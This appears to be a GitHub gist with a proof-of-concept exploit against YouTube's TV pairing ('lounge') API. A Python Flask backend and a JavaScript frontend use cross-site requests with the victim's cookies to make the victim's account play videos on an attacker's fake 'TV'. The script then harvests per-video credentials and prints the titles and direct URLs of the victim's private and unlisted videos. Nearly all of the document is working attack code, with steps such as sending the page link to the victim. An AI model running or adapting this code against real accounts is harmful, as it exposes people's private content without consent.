Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
# POC Flow:
# 1. Request the victim/frontend to play all of his/her videos
# on the malicious "TV", and find out what videos are private.
#
# 2. Iterate over all of the victim's private videos,
# and request the victim/frontend to play all of
# them one by one. When the victim plays one, the
# malicious "TV" get's a credential for it.
import requests
import re
from flask import Flask, request, abort
import json
import threading
import logging
import time
from urllib.parse import unquote
import os
# Enter an API key with YouTube Data API enabled
YT_DATA_API_KEY = ""
# The host to bind the POC webserver to
host_to_bind_to = "127.0.0.1"
# List of endpoints used by the script later.
# Extracted from rquests made by the YouTube/YT TV JS,
# so some parameters have some seemingly "random" values.
API_VIDEOS = "https://www.googleapis.com/youtube/v3/videos?part=snippet%2C%20status&id=[video_ids]&key=[api_key]"
YT_SCREEN_ID = "https://www.youtube.com/api/lounge/pairing/generate_screen_id"
YT_TOKEN = "https://www.youtube.com/api/lounge/pairing/get_lounge_token_batch"
YT_BIND_INIT = "https://www.youtube.com/api/lounge/bc/bind?device=LOUNGE_SCREEN&id=8700c39e-eec8-4923-8d84-41dcd5d0435f&name=YouTube%20on%20TV&app=lb-v4&theme=cl&capabilities=dsp&mdxVersion=2&loungeIdToken=[token]&VER=8&v=2&RID=580&CVER=1&zx=lmxe5k2biyyg&t=1"
YT_BIND = "https://www.youtube.com/api/lounge/bc/bind?device=LOUNGE_SCREEN&id=8700c39e-eec8-4923-8d84-41dcd5d0435f&name=YouTube%20on%20TV&app=lb-v4&theme=cl&capabilities=dsp&mdxVersion=2&loungeIdToken=[token]&VER=8&v=2&RID=rpc&SID=[sid]&CI=1&AID=3&gsessionid=[gsid]&TYPE=xmlhttp&zx=2icgcq6qwpat&t=1"
YT_GET_VIDEO_INFO = "https://www.youtube.com/get_video_info?html5=1&video_id=[video_id]&c=TVHTML5&vvt=[ctt]"
# Regexes used to grep for specific strings in the responses
INIT_SID_REGEX = r"(?<=\[\"c\",\").+?(?=\")"
INIT_GSID_REGEX = r"(?<=\[\"S\",\").+?(?=\")"
VIDEOIDS_REGEX = r"(?<=\"videoIds\":\").+?(?=\")"
CTT_REGEX = r"(?<=\"ctt\":\").+?(?=\")"
VIDEOID_REGEX = r"(?<=\\\"videoId\\\":\\\").+?(?=\\\")"
PRIVATE_URL_REGEX = r"(?<=\"url\":\").+?(?=\")"
PRIVATE_TITLE_REGEX = r"(?<=\"title\":\").+?(?=\")"
# Global variables used by the Flask server
global lounge_token
global lounge_token_ready
lounge_token_ready = False
global current_private_video_request_id
current_private_video_request_id = 0
global current_private_video_request_video_id
global private_video_request_ready
private_video_request_ready = False
global private_video_request_done
private_video_request_done = False
global victim_uploads_pl
# Flask server / endpoints
app = Flask(__name__)
log = logging.getLogger('werkzeug')
log.disabled = True
# Check the 'Host' header to protect against
# DNS rebinding attacks
@app.before_request
def before_request_callback():
if request.headers.get("host") != host_to_bind_to + ":8090":
abort(403)
# Serves the 'frontend.html' to the victim
@app.route("/")
def get_frontend():
with open("frontend.html", "r") as file:
return file.read()
# Returns the initial configuration for the victim,
# which consists of the 'lounge_token' and the
# victim's 'uploads' playlist ID
@app.route('/get_lounge_token')
def get_lounge_token():
if lounge_token_ready == False:
return 'not-ready'
else:
return json.dumps([lounge_token, victim_uploads_pl])
# Returns the current 'private video request' to the frontend.
# The frontend is polling this endpoint, and when one
# private video is process, the backend updates the
# content to point to the next private video.
@app.route('/get_current_private_video')
def get_current_private_video():
if private_video_request_ready == False:
return 'not-ready'
elif private_video_request_done:
return 'done'
else:
return json.dumps({
"id": current_private_video_request_id,
"lounge_token": lounge_token,
"video_id": current_private_video_request_video_id
})
# end_flask
# Generates a 'screen_id'
def get_screen_id():
print("[+] Getting screen_id...")
r = requests.get(YT_SCREEN_ID)
return r.text
# Requests a 'loungeToken' with a 'screen_id'
def get_token(screen_id):
print("[+] Getting token for screen_id...")
r = requests.post(YT_TOKEN, data={"screen_ids": screen_id})
return r.json()["screens"][0]["loungeToken"]
# Get's the credentials required for the 'bind' endpoint
def init_bind(lounge_token):
print("[+] Getting the credentials for polling...")
r = requests.post(YT_BIND_INIT.replace("[token]", lounge_token))
sid = re.findall(INIT_SID_REGEX, r.text)[0]
gsid = re.findall(INIT_GSID_REGEX, r.text)[0]
return sid, gsid
# Starts polling the 'bind' endpoint.
# Waits for the frontend to "play" the victim's
# 'uploads' playlist.
def bind(lounge_token, sid, gsid):
print("[+] Starting to poll leanback bind endpoint...")
while True:
bind_url = YT_BIND.replace("[token]", lounge_token)
bind_url = bind_url.replace("[sid]", sid)
bind_url = bind_url.replace("[gsid]", gsid)
r = requests.get(bind_url)
if "\\\"videoIds\\\":[]" in r.text:
print("[!] Victim has no videos!")
return []
video_ids = re.findall(VIDEOIDS_REGEX, r.text)
if len(video_ids) > 0:
video_ids = video_ids[0].split(",")
print("[+] Victim connected! Videos: " + str(len(video_ids)))
return video_ids
# Queries the YouTube Data API to find out the
# privacy status of the provided list of videos.
def process_videos(video_ids):
unlisted_videos = []
unlisted_video_ids = []
private_video_ids = []
public_video_ids = []
print("[+] Querying YouTube Data API to find which videos are private/unlisted...")
api_url = API_VIDEOS.replace("[api_key]", YT_DATA_API_KEY)
api_url = api_url.replace("[video_ids]", ",".join(video_ids))
r = requests.get(api_url)
api_response = r.json()
for item in api_response["items"]:
if item["status"]["privacyStatus"] == "unlisted":
unlisted_video_ids.append(item["id"])
unlisted_videos.append([item["id"], item["snippet"]["title"]])
else:
public_video_ids.append(item["id"])
for video_id in video_ids:
if not video_id in public_video_ids:
if not video_id in unlisted_video_ids:
private_video_ids.append(video_id)
print("\n[+] Victim has:")
print(" " + str(len(public_video_ids)) + " public videos")
print(" " + str(len(unlisted_video_ids)) + " unlisted videos")
print(" " + str(len(private_video_ids)) + " private videos")
return unlisted_videos, private_video_ids
# Starts polling the 'bind' endpoint.
# Waits for the frontend to "play" one of the
# victim's private videos.
def bind_private(lounge_token, sid, gsid, video_id):
print("[+] Starting to poll leanback bind endpoint for private video '" + video_id + "'...")
while True:
bind_url = YT_BIND.replace("[token]", lounge_token)
bind_url = bind_url.replace("[sid]", sid)
bind_url = bind_url.replace("[gsid]", gsid)
r = requests.get(bind_url)
ctt_find = re.findall(CTT_REGEX, r.text)
video_id_find = re.findall(VIDEOID_REGEX, r.text)
if len(ctt_find) > 0:
if len(video_id_find) > 0:
if video_id_find[0] == video_id:
return ctt_find[0]
# Queries the 'get_video_info' endpoint with the
# credentials from the victim to get one private video's
# raw video url and title.
def get_private_video_info(video_id, ctt):
print("[+] Requesting 'get_video_info' with ctt for '" + video_id + "'...")
video_url = YT_GET_VIDEO_INFO.replace("[video_id]", video_id)
video_url = video_url.replace("[ctt]", ctt)
r = requests.get(video_url, headers={"X-YouTube-Client-Name": "TVHTML5", "X-YouTube-Client-Version": "6.20180913"})
response = unquote(r.text).replace("\\u0026", "&")
url = re.findall(PRIVATE_URL_REGEX, response)[0]
title = re.findall(PRIVATE_TITLE_REGEX, response)[0]
return url, title
# Start of the main POC flow
# Start the flask server.
print("[+] Starting Flask in a background thread...")
flask_thread = threading.Thread(target=app.run, kwargs={"host": host_to_bind_to,"port": 8090,"use_reloader": False})
flask_thread.start()
time.sleep(1)
print("\n[+] Server is running. Send 'http://" + host_to_bind_to + ":8090' to vitim.\n")
# Request the victim's channel ID from the user
channel_id = input("[?] Enter the victim's channel ID: ")
# Convert the channel ID to the victim's 'uploads' playlist ID.
l = list(channel_id)
l[1] = "U"
victim_uploads_pl = "".join(l)
print("[+] Victim's 'uploads' playlist ID: " + victim_uploads_pl)
print("[*] 'uploads' playlist's ID is just the channel id, but the second char 'C' -> 'U'")
print("[*] '" + channel_id + "' -> '" + victim_uploads_pl + "'\n")
# Step 1 - Requesting the victim to "play" his/her
# 'uploads' playlist.
screen_id = get_screen_id()
lounge_token = get_token(screen_id)
sid, gsid = init_bind(lounge_token)
lounge_token_ready = True
video_ids = bind(lounge_token, sid, gsid)
# Process these videos and find out which one is private/unlisted.
unlisted_videos, private_video_ids = process_videos(video_ids)
# Print the victim's unlisted videos.
print("\n[+] Victim's unlisted videos:")
for video in unlisted_videos:
print("\n ID: " + video[0])
print(" Title: " + video[1])
print(" YouTube URL: https://youtu.be/" + video[0])
print("")
# Step 2 - Iterate over all private videos of the victim,
# and request the frontend to "play" all of them one by one.
print("[+] Getting the vitim's private videos...")
private_videos = []
for video_id in private_video_ids:
current_private_video_request_video_id = video_id
# Create fresh credentials for each video.
# This could be done better, but getting the
# bind endpoint to work with only one request was
# quite complex already.
screen_id = get_screen_id()
lounge_token = get_token(screen_id)
sid, gsid = init_bind(lounge_token)
if not private_video_request_ready:
private_video_request_ready = True
# Increment the 'request ID' by one to keep the
# frontend & backend in sync.
current_private_video_request_id += 1
print("["+str(current_private_video_request_id)+"/"+str(len(private_video_ids))+"] Requesting frontend to play '" + video_id + "'...")
ctt = bind_private(lounge_token, sid, gsid, video_id)
print("[+] Got CTT '" + ctt + "' for video '" + video_id + "'!")
url, title = get_private_video_info(video_id, ctt)
private_videos.append([video_id, ctt, title, url])
# If the victim has no private videos,
# tell this to the frontend to make it
# stop polling.
if not private_video_request_ready:
private_video_request_ready = True
private_video_request_done = True
# Print the victim's private videos.
print("\n[+] Victim's private videos:")
for video in private_videos:
print("\n ID: " + video[0])
print(" Title: " + video[2].replace("+", " "))
print(" YouTube URL: https://youtu.be/" + video[0])
print(" Direct video URL: " + video[3])
print("")
print("[+] Done")
# Wait for frontend to recieve the 'done' command from
# the poll endpoint.
time.sleep(2)
# Exit ugly, because I counldn't figure out how to
# stop Flask in the other thread...
os._exit(0)
<h4 id="log"></h4>
<script>
// Write a log entry to the page.
function log(message) {
document.getElementById("log").innerHTML += "\n " + message + "<br>"
}
// Sleep.
function sleep(ms) {
return new Promise(resolve => setTimeout(resolve, ms));
}
// Send the CSRF request to play a new video/playlist on the malicious "TV".
function send_command(loungeToken, id, idType) {
return new Promise(function (resolve, reject) {
var xhr = new XMLHttpRequest()
xhr.open("post", "https://www.youtube.com/api/lounge/bc/bind?device=REMOTE_CONTROL&id=&name=Desktop&app=youtube-desktop&mdxVersion=3&VER=8&v=2&ui=1&method=setPlaylist&params={\"" + idType + "\":\"" + id + "\",\"currentIndex\":0}&loungeIdToken=" + loungeToken, true)
xhr.onload = function () {
resolve(xhr.response)
};
xhr.onerror = function () {
resolve()
}
xhr.withCredentials = true;
xhr.send("count=0")
});
}
// Send a get request.
// Used to query the backend.
function get(url) {
return new Promise(function (resolve, reject) {
var xhr = new XMLHttpRequest()
xhr.open("get", url, true)
xhr.onload = function () {
resolve(xhr.response)
};
xhr.send()
});
}
async function main() {
log("[+] Page loaded")
// Start of "Step 1"
// Poll the victim for the 'loungeToken' and for which playlist to play.
log("[+] Polling backend for loungeTokenResponse...")
var loungeTokenResponse = "not-ready"
while (loungeTokenResponse == "not-ready") {
loungeTokenResponse = await get(window.location.href + "get_lounge_token")
await sleep(200)
}
log("[+] Got loungeTokenResponse: " + loungeTokenResponse)
loungeTokenResponse = JSON.parse(loungeTokenResponse)
// Play the playlist requested by the backend.
log("[+] Triggering malicious \"TV\" to play all uploads of victim...")
await send_command(loungeTokenResponse[0], loungeTokenResponse[1], "listId")
// Start of "Step 2"
// Poll the backend to find out which private video to play.
log("[+] Polling backend for private video requests...")
var previous_id = 0
while (true) {
private_video_request = await get(window.location.href + "get_current_private_video")
if (private_video_request == "not-ready") {
continue
}
else if (private_video_request == "done") {
break
}
else {
private_video_request = JSON.parse(private_video_request)
// The ID has to be bigger then the last request.
// This way the backend & frontend can stay in sync
// to not play the same video multiple times.
if (private_video_request["id"] > previous_id) {
log("[+] Backend requested to play the private video: " + private_video_request["video_id"])
// Play the current private video on the malicious "TV".
log("[+] Playling private video '" + private_video_request["video_id"] + "' on malicious \"TV\"...")
await send_command(private_video_request["lounge_token"], private_video_request["video_id"], "videoId")
previous_id += 1;
}
}
await sleep(200)
}
log("[+] Done")
}
main()
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment